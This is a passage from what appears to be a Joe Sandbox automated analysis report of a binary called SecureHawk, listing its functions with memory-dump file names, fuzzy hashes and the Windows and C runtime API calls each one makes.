                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __lock_file_memset
                                  • String ID:
                                  • API String ID: 26237723-0
                                  • Opcode ID: 3dbd58b371b4b0421e1c21c9675c7cefff6c16f98bede310cfd06a15a664aaeb
                                  • Instruction ID: 858544fe7864a030a890de9acccf08ab6cfc15fca9e5027b7f056c3e34c88d61
                                  • Opcode Fuzzy Hash: 3dbd58b371b4b0421e1c21c9675c7cefff6c16f98bede310cfd06a15a664aaeb
                                  • Instruction Fuzzy Hash: B2018431800608EBCF1BAF649C024DF7B62BF89320F154215F8245E191D7718AE2DBA1
                                  APIs
                                    • Part of subcall function 00318C88: __getptd_noexit.LIBCMT ref: 00318C88
                                  • __lock_file.LIBCMT ref: 0031553B
                                    • Part of subcall function 00316D6E: __lock.LIBCMT ref: 00316D91
                                  • __fclose_nolock.LIBCMT ref: 00315546
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                  • String ID:
                                  • API String ID: 2800547568-0
                                  • Opcode ID: 50e0d8a6e485ae09f14795d734519e44cd81a4c73c93497a4d4d8153edb1d51f
                                  • Instruction ID: 7f0599cfd4edd4d7bdebc2c1430249067470904e3a6bf2332063f4ce134d0456
                                  • Opcode Fuzzy Hash: 50e0d8a6e485ae09f14795d734519e44cd81a4c73c93497a4d4d8153edb1d51f
                                  • Instruction Fuzzy Hash: 1AF09631901B04DBD71BAB6598027DE67A26F8E334F158205F455AF1C1CF7C49C15B55
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: SleepTimetime
                                  • String ID:
                                  • API String ID: 346578373-0
                                  • Opcode ID: 3d69b6a48647558b33d74f5d365038a88c1fee63e368d89213c36afdc6794b6f
                                  • Instruction ID: 11aaef4e13c7a2703fae695fa4bb4dba4fa7de4f7a7831616d0b3f93f9f1cff0
                                  • Opcode Fuzzy Hash: 3d69b6a48647558b33d74f5d365038a88c1fee63e368d89213c36afdc6794b6f
                                  • Instruction Fuzzy Hash: 5EF05E3025061A9FD394AB68D459B76F7E8AF483A0F010079E62AC7361DF60A814CB91
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,00356F77,00000000,00000000,00332E79), ref: 00356E6C
                                  • InterlockedExchange.KERNEL32(00000034,00000000), ref: 00356E8E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                  • String ID:
                                  • API String ID: 4104817828-0
                                  • Opcode ID: d01ff17fe7f343905206e953b3bbbe40003fb08288b0485b501de685a07c35dd
                                  • Instruction ID: 1e8f90d03c6b3c2fea38d3f41867a909667e41ca7d071002338d6eb829e8f579
                                  • Opcode Fuzzy Hash: d01ff17fe7f343905206e953b3bbbe40003fb08288b0485b501de685a07c35dd
                                  • Instruction Fuzzy Hash: 2EF034B11007059FC3219F16D9488A7FBECEF84710B00882EE88A87A10CBB4A405CB61
                                  APIs
                                  • __lock_file.LIBCMT ref: 00315DE4
                                  • __ftell_nolock.LIBCMT ref: 00315DEF
                                    • Part of subcall function 00318C88: __getptd_noexit.LIBCMT ref: 00318C88
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                  • String ID:
                                  • API String ID: 2999321469-0
                                  • Opcode ID: 4d491d20be7843300aa70e8b77e9384f4b97ce2c62072cd4d4638f5196b3bcb0
                                  • Instruction ID: 553cb9091f9cf682d5cb5654fedcc2b8e34f12aaa000ddb9ecc4ecf746435382
                                  • Opcode Fuzzy Hash: 4d491d20be7843300aa70e8b77e9384f4b97ce2c62072cd4d4638f5196b3bcb0
                                  • Instruction Fuzzy Hash: 25F03731951605DBD71BBB7558437EEB6A0AF49331F154205F010AF1C1CF784AC256A9
                                  APIs
                                  • _memset.LIBCMT ref: 00305AEF
                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00305B1F
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell__memset
                                  • String ID:
                                  • API String ID: 928536360-0
                                  • Opcode ID: 7b87ed923780ad75a5eb183b28e42488b4f4442d8a1a67e05dd264a144ce0839
                                  • Instruction ID: 1885c60752bf481e31b9057ee0e7d52733091239568d1167f3cd3cfb3d8fff7c
                                  • Opcode Fuzzy Hash: 7b87ed923780ad75a5eb183b28e42488b4f4442d8a1a67e05dd264a144ce0839
                                  • Instruction Fuzzy Hash: D0F0A7709043089FE7A38B64DC467D677BC9B0030CF0002E9AB089A296D7790B88CF91
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LoadString$__swprintf
                                  • String ID:
                                  • API String ID: 207118244-0
                                  • Opcode ID: d3ebddd4c4e8467445f24f554f352173c590e2a9bdb67e1fc54e0090955f1af0
                                  • Instruction ID: afca1667a2a0ef3186e7d42d6d4fb7c868e9cc73fa49efb65718d55ac5fb2e03
                                  • Opcode Fuzzy Hash: d3ebddd4c4e8467445f24f554f352173c590e2a9bdb67e1fc54e0090955f1af0
                                  • Instruction Fuzzy Hash: 44B16A34A1010AEFCB16EF98D891DFEB7B5FF48310F24801AF955AB291DB31A955CB90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  • Opcode ID: 5d4da83587e5007c110fe60792eae86927f1ffedeb55535a96607352e3b175cc
                                  • Instruction ID: fbeb3cf7b54a745877e08b859dc0dd3338266a3c83a01103c9483a984a978b53
                                  • Opcode Fuzzy Hash: 5d4da83587e5007c110fe60792eae86927f1ffedeb55535a96607352e3b175cc
                                  • Instruction Fuzzy Hash: 5731F475605602DFC72ADF19D4A0A61F7A8FF09310715C56AE88ACF7A1D730EC82CB84
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 061fd9ceaf78c0e5868c95162b980bba1416047b22cd48ed2126554f9a18d3a6
                                  • Instruction ID: ce2cfc439d688dc365bbf0e8dee1abaeff0133a23594a7b25ab06e1ae86aa7e9
                                  • Opcode Fuzzy Hash: 061fd9ceaf78c0e5868c95162b980bba1416047b22cd48ed2126554f9a18d3a6
                                  • Instruction Fuzzy Hash: BD4125745083159FDB25DF14C488B2ABBE1BF44348F0988ACE98A4B362C371EC95CB92
                                  APIs
                                    • Part of subcall function 00304B29: FreeLibrary.KERNEL32(00000000,?), ref: 00304B63
                                    • Part of subcall function 003153AB: __wfsopen.LIBCMT ref: 003153B6
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003027AF,?,00000001), ref: 003049F4
                                    • Part of subcall function 00304ADE: FreeLibrary.KERNEL32(00000000), ref: 00304B18
                                    • Part of subcall function 003048B0: _memmove.LIBCMT ref: 003048FA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Library$Free$Load__wfsopen_memmove
                                  • String ID:
                                  • API String ID: 1396898556-0
                                  • Opcode ID: 4b3019f413bd79972cd9da86a9cd975e404592b9680f3f7c8ffd050934f4561e
                                  • Instruction ID: 3c092ab74b8686a12be70b0cf7282a61e199c7561c46c2bbf81ee512ac18ab20
                                  • Opcode Fuzzy Hash: 4b3019f413bd79972cd9da86a9cd975e404592b9680f3f7c8ffd050934f4561e
                                  • Instruction Fuzzy Hash: EC110172751205ABCB16BB748D22FAE73A89F40701F10882DF642AE1C1EA719B14A794
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: b07e295d6e17349cf2d0e5bd2eb456ffc771a534c7ce324b8dcfbec6f8c65160
                                  • Instruction ID: a58d9ddd04b283c0115764a59d7135b6867e1e04be87dd60d67a7bad02030823
                                  • Opcode Fuzzy Hash: b07e295d6e17349cf2d0e5bd2eb456ffc771a534c7ce324b8dcfbec6f8c65160
                                  • Instruction Fuzzy Hash: C1215774518315DFCB19DF14C455B6ABBE0BF88344F05496CF98A4B322C331E859CB92
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  • Opcode ID: 6778dc3fdde9cfdb527c97005aa679221d1e380f203fcd52dcdb994629c8b2d6
                                  • Instruction ID: a777bfadb4bfbc0e10c4d40df7cf7292ecccd4e46e9311b31966825a5242c2e9
                                  • Opcode Fuzzy Hash: 6778dc3fdde9cfdb527c97005aa679221d1e380f203fcd52dcdb994629c8b2d6
                                  • Instruction Fuzzy Hash: 8601FE733017016ED3295F38DC02B6777A8DB48790F50852DF51ACE1D1DB71E4908760
                                  APIs
                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0036477C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: EnvironmentVariable
                                  • String ID:
                                  • API String ID: 1431749950-0
                                  • Opcode ID: 730419188f3e42dcad30c47f8ca8add3b78facd2c963d9a6b77fe59b8245a7b7
                                  • Instruction ID: 0a0bed2e94b845643a95b477a8020d54280458697eb1ef8871719a05055c1b23
                                  • Opcode Fuzzy Hash: 730419188f3e42dcad30c47f8ca8add3b78facd2c963d9a6b77fe59b8245a7b7
                                  • Instruction Fuzzy Hash: 98F03135608208AFDB19FB65D84ACAF77B8EF49320B004156F9049B261DFB1A991C7A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _fseek
                                  • String ID:
                                  • API String ID: 2937370855-0
                                  • Opcode ID: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                                  • Instruction ID: fb7b2b98e610be64859fd9b856b62496e4d8079ae73e1fac3de7cfb23df209bf
                                  • Opcode Fuzzy Hash: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                                  • Instruction Fuzzy Hash: 5AF085B6500208FFCF168F84DC00CEBBBBDEB89320F004098FA045A210D332EA21CBA1
                                  APIs
                                  • FreeLibrary.KERNEL32(?,?,?,003027AF,?,00000001), ref: 00304A63
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: a0f31636e1e10a51e1bb0770fc8f4df368cfa3abf48e93348b25437addc70cf0
                                  • Instruction ID: 73dd236d7e2841eff4df6373386e08dc38b4543e8a466abfe758a61f16dd78c0
                                  • Opcode Fuzzy Hash: a0f31636e1e10a51e1bb0770fc8f4df368cfa3abf48e93348b25437addc70cf0
                                  • Instruction Fuzzy Hash: 46F030B1246701CFCB369F64E4A4816BBF4BF94325311897EE6D783A50C7319A84DF44
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                                  • Instruction ID: 0b34ef14b445fb9cf5a4f9da4344ba6abb534a221fc8f23685334958d3f2d283
                                  • Opcode Fuzzy Hash: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                                  • Instruction Fuzzy Hash: 6DF0F87250420DFFDF05DF90C941EAABBB9FB18314F208589F9158A251D336EA61EB91
                                  APIs
                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 0031090F
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LongNamePath_memmove
                                  • String ID:
                                  • API String ID: 2514874351-0
                                  • Opcode ID: ce57bc1525fd25bf7d2f50b1bb344e229dca06d4971e42cd68572a13777fd903
                                  • Instruction ID: ea29e8641a1a97ffb7cf306ccac32585b2d356d9928d5421d56f281e756b4d47
                                  • Opcode Fuzzy Hash: ce57bc1525fd25bf7d2f50b1bb344e229dca06d4971e42cd68572a13777fd903
                                  • Instruction Fuzzy Hash: 43E08636A012285BC722D698DC06FEAB7EDDB88790F0441B6FC09D7244D9605D818691
                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00354B9E
                                    • Part of subcall function 00301821: _memmove.LIBCMT ref: 0030185B
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: FolderPath_memmove
                                  • String ID:
                                  • API String ID: 3334745507-0
                                  • Opcode ID: fdd04db987c9b014cfb30508f096a4a6ec799d572bc921e5376137dfd9db7003
                                  • Instruction ID: b89f15caf8b24b4c4d7728854d7dd59bc11fa1137e49e9ce0dfb222b62be2485
                                  • Opcode Fuzzy Hash: fdd04db987c9b014cfb30508f096a4a6ec799d572bc921e5376137dfd9db7003
                                  • Instruction Fuzzy Hash: 01D05EB190032C2BDB64E6A59C0DDB77BACD744220F0006E1BC5CD3142E9249D458AE0
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00067615,00000000,00000000,?), ref: 0035764A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 59714b6fe0ef1d6e563b5135d0baf2e94ec87cfa04e79e4c1f8b9cff1b1ce04a
                                  • Instruction ID: 07334b1378c5a22d5b4dd23886da084e6aab33cc912604f6a43070992ba417ad
                                  • Opcode Fuzzy Hash: 59714b6fe0ef1d6e563b5135d0baf2e94ec87cfa04e79e4c1f8b9cff1b1ce04a
                                  • Instruction Fuzzy Hash: 1DD012714247147F566D8B65EC0ACA7769CEA05625740076EBC0581500F6A1BC0486A0
                                  APIs
                                  • GetFileAttributesW.KERNEL32(?,00353A6B), ref: 00354E5A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: c5d74019e27ba5efaf5cb04dd0f4354534a6b653a8847684e1d5bd0d9080847e
                                  • Instruction ID: f85df450f8b4ef001f0159390ca5e1d1fc0747b376bdb96c8168a7fa92100447
                                  • Opcode Fuzzy Hash: c5d74019e27ba5efaf5cb04dd0f4354534a6b653a8847684e1d5bd0d9080847e
                                  • Instruction Fuzzy Hash: 11B09238000600469DAE0A78290E999332468827BEFDA1BC0DC74A58F282398C8FA750
                                  APIs
                                  Memory Dump Source
